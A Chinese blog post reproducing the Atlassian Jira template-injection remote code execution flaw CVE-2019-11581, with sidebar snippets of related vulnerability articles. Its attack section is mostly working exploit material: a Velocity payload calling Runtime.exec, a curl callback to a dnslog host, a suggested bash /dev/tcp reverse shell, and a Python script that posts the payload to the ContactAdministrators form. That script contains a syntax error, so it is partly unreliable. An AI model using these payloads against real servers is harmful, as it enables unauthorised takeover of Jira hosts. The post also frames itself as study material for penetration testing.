Atlassian Jira RCE CVE-2019-11581 漏洞复现渗透测试

最新推荐文章于 2024-05-28 15:44:14 发布
最新推荐文章于 2024-05-28 15:44:14 发布
阅读量1.8k 收藏
点赞数
分类专栏: 渗透测试 文章标签: 渗透测试 信息安全 atlassian
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kelenwait/article/details/118640268
版权

简介

Jira Software 专为软件团队中的每位成员构建,可用于规划、跟踪和发布卓越的软件。
此漏洞由于Atlassian Jira中的Atlassian Jira Server和Jira Data Center模块存在模板注入,攻击者可以在表单插入java恶意代码,当服务端对传入数据进行解析时,会执行数据中插入的恶意代码,并执行其中的命令。可接管服务器。

影响版本

Atlassian Jira 4.4.x 5.x.x 6.x.x 7.x.x
Atlassian Jira < 8.2.3

漏洞复现

  • 利用条件
    后台开启联系管理员

访问url后填写内容,主题填写poc后点击发送

/secure/ContactAdministrators!default.jspa

稍等一会儿刷新DNSLog,可以查看到存在数据访问

poc

$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl baekig.dnslog.cn').waitFor()

exec 里可以执行命令,笔者是借助dnslog进行测试,
读者在linux环境下可以使用 bash -i >& /dev/tcp/主机ip/port 0>&1反弹shell。

附:某大老的检测poc

import requests
from bs4 import BeautifulSoup

def check(url,cmd):
    headers = {'UserAgent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0'}
    domain = url + '/secure/ContactAdministrators!default.jspa'
    s = requests.Session()
    r = s.get(domain, verify=False,timeout=12)
    html_doc = r.content
    soup = BeautifulSoup(html_doc, 'lxml')

    notvuln = soup.findAll("div", {"class": "aui-message aui-message-warning warningd"})
    if notvuln:
        print("[-] Not Vulnerable")
        return False
    else:
        print("[+] Checking if Vulnerable")
        html_doc = r.content
        soup = BeautifulSoup(html_doc, 'lxml')
        data = soup.findAll(attrs={"name": "atl_token"})
        token = data[0]['value']
        domain = domain.replace('!default.jspa', '.jspa')
        payload = "$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('%s').waitFor()" % cmd
        qparams = (('from', 'JIRA@JIRA.com'), ('subject', payload), ('details', payload), ('atl_token', token),
                   ('Send', 'Send'))
        attack = s.post(domain, headers=headers, data=qparams, verify=False,timeout=12)
        return attack.status_code == 200:

if __name__ == '__main__':
    check('xxxx','curl qbocy6.dnslog.cn')

修复建议

关闭联系管理员功能,升级版本

注意:本文仅供学习参考,非法传播及使用产生的后果自行承担,与本文作者无关

欢迎讨论,持续更新中,感谢关注!

烽铃子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2019-11581漏洞复现
yeshankuangrenaaaaa的博客
07-23 1851
CVE-2019-11581漏洞复现 Author:IronDate:2020-07-20 文章目录CVE-2019-11581漏洞复现@[toc]参考链接漏洞描述产品描述漏洞描述漏洞影响版本靶机环境搭建环境版本安装Jira配置Jira漏洞复现发起攻击攻击效果前后对比 参考链接 下载地址 安装教程 漏洞信息 漏洞描述 产品描述 Atlassian Jira是澳大利亚Atlassian公司的一套缺陷跟踪管理系统。该系统主要用于对工作中各类问题、缺陷进行跟踪管理。 漏洞描述 攻击者可以利用此漏洞对运行受影响
Jira 未经身份验证用户名枚举漏洞CVE-2020-14181)复现
锋刃科技的博客
03-19 4156
简介 Atlassian Jira是企业广泛使用的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。 影响版本 Jira < 7.13.6 Jira 8.0.0 - 8.5.7 Jira 8.6.0 - 8.12.0 环境搭建 这里使用docker进行搭建 https://github.com/vulhub/vulhub/tree/master/jira/CVE-2019-11581 进入...
Atlassian JIRA服务器模板注入漏洞CVE-2019-11581
qq_44504968的博客
04-06 1012
Atlassian JIRA服务器模板注入漏洞CVE-2019-11581)一、漏洞原理二、漏洞风险等级三、漏洞影响范围四、实验环境4.1靶机:4.2攻击机:五、漏洞复现六、漏洞修复方案 一、漏洞原理 Atlassian Jira是企业广泛使用的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。 因atlassian-jira/WEB-INF/classes/com/atlassian/jira/web/action/user/Contact
JavaScript原型链污染原理及相关CVE漏洞剖析
最新发布
白帽黑客八哥的博客
05-28 684
有些JavaScript库的函数支持根据指定的路径修改或定义对象的属性值。通常这些函数类似以下的形式:theFunction(object, path, value),将对象object的指定路径path上的属性值修改为value。如果攻击者可以控制路径path的值,那么将路径设置为_proto_.theValue,运行theFunction函数之后就有可能将theValue属性注入到object的原型中。
cve-2019-11581 Atlassian Jira未授权服务端模板注入漏洞
whatday的专栏
12-21 1943
漏洞描述 Atlassian Jira是澳大利亚Atlassian公司的一套缺陷跟踪管理系统。该系统主要用于对工作中各类问题、缺陷进行跟踪管理。 Atlassian Jira Server和Jira Data Center存在服务端模板注入漏洞,成功利用此漏洞的攻击者可在运行受影响版本的Jira Server或Jira Data Center系统上执行任意命令。 目前PoC已放出,建议受影响的客户尽快升级或采用临时缓解措施。 第一种情况,Jira服务端已配置好SMTP服务器,且“联系管理员表单”
Atlassian Jira 模板注入漏洞CVE-2019-11581复现
锋刃科技的博客
12-13 1530
漏洞描述 Atlassian Jira是企业广泛使用的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。 多个版本前存在利用模板注入执行任意命令: 影响范围 4.4.x 5.x.x 6.x.x 7.0.x 7.1.x 7.2.x 7.3.x 7.4.x 7.5.x 7.6.x before 7.6.14 (the fixed version for 7.6.x) 7.7.x 7.8.x 7.9.x 7.10.x 7.11...
jira漏洞复现
Shanfenglan's blog
12-03 4010
文章目录1. Atlassian Jira 模板注入漏洞CVE-2019-11581)1.1 利用参考文章 1. Atlassian Jira 模板注入漏洞CVE-2019-11581) 影响版本 4.4.x 5.x.x 6.x.x 7.0.x 7.1.x 7.2.x 7.3.x 7.4.x 7.5.x 7.6.x before 7.6.14 (the fixed version for 7.6.x) 7.7.x 7.8.x 7.9.x 7.10.x 7.11.x 7.12.x 7.13.x befor
atlassian-jira-software-8.17.1-x64.exe
08-03
jira8.17.1下载,windows安装
docker-atlassian-jira-data-center:Dockerized Atlassian Jira数据中心,用于插件开发期间的本地测试
05-08
Docker Atlassian Jira数据中心 使用Docker启动,以在插件开发期间进行本地测试。 它启动一个PostgreSQL数据库,几个Jira群集节点和Apache2 HTTPD作为粘性会话负载平衡器。 共享的jira-home通过共享的Docker卷处理...
atlassian-jira-enterprise-4.0.2-standalone
06-07
Atlassian JIRA Enterprise 4.0.2:缺陷跟踪与项目管理的卓越工具》 Atlassian JIRA,作为一款全球广泛使用的缺陷跟踪和项目管理软件,是许多企业和团队进行高效协作的重要工具。JIRA Enterprise 4.0.2 版本更是...
atlassian-jira-software-8.11.1-x64.bin
09-03
敏捷团队的首选软件和开发工具,最优秀的软件团队交付频率高且速度快。 Jira Software 专为软件团队中的每位成员构建,可用于规划、跟踪和发布卓越的软件
jira-misc-workflow-extensions-2.5.7.1.jar jira 流扩展插件
08-18
1、jira-misc-workflow-extensions-2.5.7.1.jar; 2、jira流扩展插件; 3、提供更多的 触发条件/校验条件/结果处理;
跨站脚本漏洞(XSS)示例
04-15
NULL 博文链接:https://songjianyong.iteye.com/blog/1754973
atlassian-jira-software-7.8.1-x64.bin
09-10
JIRAAtlassian公司出品的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。
漏洞笔记--Jira 相关漏洞复现及利用
NoooEmotion的博客
01-28 4064
Atlassian Jira是企业广泛使用的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。
CVE-2022-26135 Atlassian Jira Mobile Plugin SSRF漏洞分析
小王的储物间
01-31 394
其中batchService接口的实现类BatchServiceImpl位于com.atlassian.jira.plugin.mobile.service.impl.BatchServiceImpl.class。插件,在com.atlassian.jira.plugin.mobile.rest.v1_0.BatchResource中存在barch。继续跟进,位于com.atlassian.jira.plugin.mobile.util.LinkBuilder.class。
Atlassian Jira 模板注入漏洞CVE-2019-11581
EC_Carrot的博客
07-06 390
漏洞详细 请移步:https://vulhub.org/#/environments/jira/CVE-2019-11581/
atlassian confluece 信息泄露漏洞
cnbird's blog
08-28 1715
#!/usr/bin/env python import httplib, json, sys, re if (re.search("^https://", sys.argv[1].lower()) == None): httpconnection = httplib.HTTPConnection(re.split("^http://",sys.argv[1].lower())[1])
Atlassian JIRA服务器模板注入漏洞复现CVE-2019-11581
渗透测试研究中心
09-29 444
0x00 漏洞描述 Atlassian Jira是澳大利亚Atlassian公司的一套缺陷跟踪管理系统。该系统主要用于对工作中各类问题、缺陷进行跟踪管理。 Atlassian Jira Server和Jira Data Center存在服务端模板注入漏洞,成功利用此漏洞的攻击者可对运行受影响版本的Jira Server或Jira Data Center的服务器执行任意命令,从而获取服务器权限,...
CVE-2021-26086
05-22
CVE-2021-26086是一个影响Atlassian Confluence Server和Data Center的高危漏洞。攻击者可以利用这个漏洞执行远程代码,可能导致服务器完全被控制。这个漏洞是因为Confluence Server和Data Center中的Ognl表达式注入漏洞造成的,攻击者可以通过发送经过修改的HTTP请求,注入恶意代码,从而远程执行代码。 Atlassian已经发布了相关的安全公告,并提供了补丁程序。如果您正在使用受影响的版本,请立即更新到最新版本以保护您的系统安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值